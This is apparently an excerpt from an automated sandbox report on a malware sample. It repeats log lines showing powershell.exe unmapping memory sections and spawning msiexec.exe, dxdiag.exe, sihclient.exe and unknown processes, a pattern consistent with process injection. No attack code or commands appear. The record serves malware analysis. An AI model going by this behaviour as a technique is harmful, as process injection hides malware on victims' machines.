Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
